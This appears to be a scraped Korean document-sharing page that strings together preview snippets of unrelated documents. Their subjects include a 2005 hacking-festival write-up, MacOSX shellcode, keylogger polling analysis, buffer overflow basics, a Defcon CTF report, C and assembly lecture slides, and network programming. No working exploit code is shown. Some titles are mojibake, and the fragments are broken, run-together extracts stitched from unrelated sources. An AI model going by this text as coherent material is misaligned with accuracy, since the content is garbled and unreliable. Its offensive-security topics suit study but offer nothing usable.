UDCSC Hacking Festival 2005 UDCSC Hacking Festival 2005 작성자 : 유동훈 목차 0x00: 소개인사 0x01: Level1 문제 0x02: Level2 문제 0x03: Level3 문제 0x04: Level4 문제 0x05: Level5 문제 0x06: Level6 문제 0x07: 후기 0x00: 소개인사 안녕하세요. 이렇게만나뵙게되어서반갑습니다. 이번이벤트를주최해주신여러분들께진심으로감사드리는바입니다.

More information

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾

À©µµ³×Æ®¿÷ÇÁ·Î±×·¡¹Ö4Àå_ÃÖÁ¾ P a 02 r t Chapter 4 TCP Chapter 5 Chapter 6 UDP Chapter 7 Chapter 8 GUI C h a p t e r 04 TCP 1 3 1 2 3 TCP TCP TCP [ 4 2] listen connect send accept recv send recv [ 4 1] PC Internet Explorer HTTP HTTP

More information

Microsoft PowerPoint - a8a.ppt [호환 모드]

Microsoft PowerPoint - a8a.ppt [호환 모드] 이장의내용 8 장고급프로시저 스택프레임 재귀 (Recursion) Invoke, Addr, Proc, Proto 디렉티브 다중모듈프로그램작성 2 8.2 스택프레임 Stack Frame ( 또는 activation record) procedure 의다음사항을저장한 영역 urn address passed parameter ( 스택매개변수 ) saved register

More information

Execute_Shellcode_on_the_MacOSX.txt - 메모장

Execute_Shellcode_on_the_MacOSX.txt - 메모장 ####################################################################### Execute Shellcode on the MacOSX 1ndr4 "indra.kr". " x40". "gmail.com" http://indra.linuxstudy.pe.kr 2005. 08. 19. ########################################################################

More information

chap7.key

chap7.key 1 7 C 2 7.1 C (System Calls) Unix UNIX man Section 2 C. C (Library Functions) C 1975 Dennis Ritchie ANSI C Standard Library 3 (system call). 4 C?... 5 C (text file), C. (binary file). 6 C 1. : fopen( )

More information

Microsoft PowerPoint - polling.pptx

Microsoft PowerPoint - polling.pptx 지현석 (binish@home.cnu.ac.kr) http://binish.or.kr Index 이슈화된키보드해킹 최근키보드해킹이슈의배경지식 Interrupt VS polling What is polling? Polling pseudo code Polling 을이용한키로거분석 방어기법연구 이슈화된키보드해킹 키보드해킹은연일상한가! 주식, 펀드투자의시기?! 최근키보드해킹이슈의배경지식

More information

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 -

(Asynchronous Mode) ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - (Asynchronous Mode) - - - ( 1, 5~8, 1~2) & (Parity) 1 ; * S erial Port (BIOS INT 14H) - 1 - UART (Univ ers al As y nchronous Receiver / T rans mitter) 8250A 8250A { COM1(3F8H). - Line Control Register

More information

/chroot/lib/ /chroot/etc/

/chroot/lib/ /chroot/etc/ 구축 환경 VirtualBox - Fedora 15 (kernel : 2.6.40.4-5.fc15.i686.PAE) 작동 원리 chroot유저 ssh 접속 -> 접속유저의 홈디렉토리 밑.ssh의 rc 파일 실행 -> daemonstart실행 -> daemon 작동 -> 접속 유저만의 Jail 디렉토리 생성 -> 접속 유저의.bashrc 의 chroot 명령어

More information

歯7장.PDF

歯7장.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

untitled

untitled int i = 10; char c = 69; float f = 12.3; int i = 10; char c = 69; float f = 12.3; printf("i : %u\n", &i); // i printf("c : %u\n", &c); // c printf("f : %u\n", &f); // f return 0; i : 1245024 c : 1245015

More information

chap7.PDF

chap7.PDF 7 Hello!! C 2 . 3 ([] ) < > [ ]; int array[10]; < > [ ][ ]; int array [3] [5]; 4 < > [ ]={ x1,,x10} ( ); (,). ({}). : int array[10]={1,2,3,4,5,6,7,8,9,10}; (" "). : char array[7]="turbo-c"; 5 int array[2][3]={{1,2},{3,4},{5,6}};

More information

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F >

<4D F736F F F696E74202D20B8B6C0CCC5A9B7CEC7C1B7CEBCBCBCAD202839C1D6C2F7207E203135C1D6C2F > 10주차 문자 LCD 의인터페이스회로및구동함수 Next-Generation Networks Lab. 5. 16x2 CLCD 모듈 (HY-1602H-803) 그림 11-18 19 핀설명표 11-11 번호 분류 핀이름 레벨 (V) 기능 1 V SS or GND 0 GND 전원 2 V Power DD or V CC +5 CLCD 구동전원 3 V 0 - CLCD 명암조절

More information

歯9장.PDF

歯9장.PDF 9 Hello!! C printf() scanf() getchar() putchar() gets() puts() fopen() fclose() fprintf() fscant() fgetc() fputs() fgets() gputs() fread() fwrite() fseek() ftell() I/O 2 (stream) C (text stream) : `/n'

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 10 포인터 01 포인터의기본 02 인자전달방법 03 포인터와배열 04 포인터와문자열 변수의주소를저장하는포인터에대해알아본다. 함수의인자를값과주소로전달하는방법을알아본다. 포인터와배열의관계를알아본다. 포인터와문자열의관계를알아본다. 1.1 포인터선언 포인터선언방법 자료형 * 변수명 ; int * ptr; * 연산자가하나이면 1 차원포인터 1 차원포인터는일반변수의주소를값으로가짐

More information

untitled

untitled while do-while for break continue while( ) ; #include 0 i int main(void) int meter; int i = 0; while(i < 3) meter = i * 1609; printf("%d %d \n", i, meter); i++; return 0; i i< 3 () 0 (1)

More information

61 62 63 64 234 235 p r i n t f ( % 5 d :, i+1); g e t s ( s t u d e n t _ n a m e [ i ] ) ; if (student_name[i][0] == \ 0 ) i = MAX; p r i n t f (\ n :\ n ); 6 1 for (i = 0; student_name[i][0]!= \ 0&&

More information

No Slide Title

No Slide Title Copyright, 2017 Multimedia Lab., UOS 시스템프로그래밍 (Assembly Code and Calling Convention) Seong Jong Choi chois@uos.ac.kr Multimedia Lab. Dept. of Electrical and Computer Eng. University of Seoul Seoul, Korea

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Development Environment 2 Jo, Heeseung make make Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one It

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 DEVELOPMENT ENVIRONMENT 2 MAKE Jo, Heeseung MAKE Definition make is utility to maintain groups of programs Object If some file is modified, make detects it and update files related with modified one 2

More information

BOF Foundation.doc

BOF Foundation.doc 해커지망자들이알아야할 Buffer Overflow Attack 의기초 What every applicant for the hacker should know about the foundation of buffer overflow attacks By 달고나 (Dalgona@wowhacker.org) Email: zinwon@gmail.com 2005 년 9월 5일

More information

Microsoft PowerPoint - [2009] 02.pptx

Microsoft PowerPoint - [2009] 02.pptx 원시데이터유형과연산 원시데이터유형과연산 원시데이터유형과연산 숫자데이터유형 - 숫자데이터유형 원시데이터유형과연산 표준입출력함수 - printf 문 가장기본적인출력함수. (stdio.h) 문법 ) printf( Test printf. a = %d \n, a); printf( %d, %f, %c \n, a, b, c); #include #include

More information

슬라이드 1

슬라이드 1 -Part3- 제 4 장동적메모리할당과가변인 자 학습목차 4.1 동적메모리할당 4.1 동적메모리할당 4.1 동적메모리할당 배울내용 1 프로세스의메모리공간 2 동적메모리할당의필요성 4.1 동적메모리할당 (1/6) 프로세스의메모리구조 코드영역 : 프로그램실행코드, 함수들이저장되는영역 스택영역 : 매개변수, 지역변수, 중괄호 ( 블록 ) 내부에정의된변수들이저장되는영역

More information

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf("hihi\n"); } warning: conflicting types for functiona

4. #include <stdio.h> #include <stdlib.h> int main() { functiona(); } void functiona() { printf(hihi\n); } warning: conflicting types for functiona 이름 : 학번 : A. True or False: 각각항목마다 True 인지 False 인지적으세요. 1. (Python:) randint 함수를사용하려면, random 모듈을 import 해야한다. 2. (Python:) '' (single quote) 는한글자를표현할때, (double quote) 는문자열을표현할때사용한다. B. 다음에러를수정하는방법을적으세요.

More information

Microsoft PowerPoint - ch07 - 포인터 pm0415

Microsoft PowerPoint - ch07 - 포인터 pm0415 2015-1 프로그래밍언어 7. 포인터 (Pointer), 동적메모리할당 2015 년 4 월 4 일 교수김영탁 영남대학교공과대학정보통신공학과 (Tel : +82-53-810-2497; Fax : +82-53-810-4742 http://antl.yu.ac.kr/; E-mail : ytkim@yu.ac.kr) Outline 포인터 (pointer) 란? 간접참조연산자

More information

hlogin7

hlogin7 0x07. Return Oriented Programming ROP? , (DEP, ASLR). ROP (Return Oriented Programming) (excutable memory) rop. plt, got got overwrite RTL RTL Chain DEP, ASLR gadget Basic knowledge plt, got call function

More information

0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit

0x00 Contents 0x About Nickster 0x Analaysis 0x Exploit Defcon CTF 17 th Nickster Report StolenByte(Son Choong-Ho) http://stolenbyte.egloos.com thscndgh_4@hotmail.com WOWHACKER 2009. 08. 09 0x00 Contents 0x01 ------------- About Nickster 0x02 -------------

More information

Microsoft PowerPoint - a6.ppt [호환 모드]

Microsoft PowerPoint - a6.ppt [호환 모드] 이장의내용 6 장조건부처리 부울과비교명령어 조건부점프 조건부루프명령어 조건부구조 컴퓨터정보통신 어셈블리언어 2 6.2 부울과비교명령어 부울명령어 Instructions ti 동작 AND dst, src OR dst, src XOR dst, src NOT dst dst dst AND src dst dst OR src dst dst XOR src dst NOT

More information

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4

0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x = (12 + 6) / 2 * 3; x = 27 x = 3 * (8 / 4 Introduction to software design 2012-1 Final 2012.06.13 16:00-18:00 Student ID: Name: - 1 - 0. 표지에이름과학번을적으시오. (6) 1. 변수 x, y 가 integer type 이라가정하고다음빈칸에 x 와 y 의계산결과값을적으시오. (5) x = (3 + 7) * 6; x = 60 x

More information

$ret = ""; $socket = fsockopen(" ", 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $

$ret = ; $socket = fsockopen( , 8888, $errno, $errstr, 100); fgets( $socket, 50); fgets( $socket, 50); $ret.= fgets( $socket, 50); $ The 5eX m2n 푼문제 : O O O X O X X O O X O O O O X O X O O O level1 : parse string Level1은 210:207.246.131 이라는 IP와 8888이라는포트번호가주어진다. 접속하여보면, base64로인코딩된스트링을보여주면서, Plain text를전송하라고한다. Base64된스트링을디코드해보면, beistlab

More information

Infinity(∞) Strategy

Infinity(∞) Strategy 배열 (Array) 대용량데이터 대용량데이터를다루는기법 배열 (Array) 포인터 (Pointer) 구조체 (Structure) 파일 (File) 변수 (Variable) 변수및메모리할당 변수선언 : int imsi; imsi 4 Bytes 변수선언 : char imsi2; imsi2 1 Byte 배열 (Array) 배열 동일한데이터형을가지고있는데이터들을처리할때사용

More information

Microsoft PowerPoint - chap13-입출력라이브러리.pptx

Microsoft PowerPoint - chap13-입출력라이브러리.pptx #include int main(void) int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; 1 학습목표 스트림의 기본 개념을 알아보고,

More information

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri

Table Of Contents 1/7 0. Introduction 0-1. Introduction 0-1. Testing Environment 1. Software Vulnerabilty Review 1-1. Buffer OverFlow 1-2. Format Stri Windows System Hacking Technique Author E-Mail Blog Community Company : 조현석 (evernick) : 김언체 (ruina) : evernick@naver.com : ruina_s@naver.com : http://ruinick.tistory.com : http://cafe.naver.com/rekcah

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Network Programming Jo, Heeseung Network 실습 네트워크프로그래밍 멀리떨어져있는호스트들이서로데이터를주고받을수있도록프로그램을구현하는것 파일과는달리데이터를주고받을대상이멀리떨어져있기때문에소프트웨어차원에서호스트들간에연결을해주는장치가필요 이러한기능을해주는장치로소켓이라는인터페이스를많이사용 소켓프로그래밍이란용어와네트워크프로그래밍이랑용어가같은의미로사용

More information

Microsoft Word - ExecutionStack

Microsoft Word - ExecutionStack Lecture 15: LM code from high level language /* Simple Program */ external int get_int(); external void put_int(); int sum; clear_sum() { sum=0; int step=2; main() { register int i; static int count; clear_sum();

More information

=

= written by vangelis(vangelis@wowhacker.org) 0 0000 8 1000 1 0001 9 1001 2 0010 10 1010 3 0011 11 1011 4 0100 12 1100 5 0101 13 1101 6 0110 14 1110 7 0111 15 1111 110112 + 100012 = 1011002 110 0000 0101

More information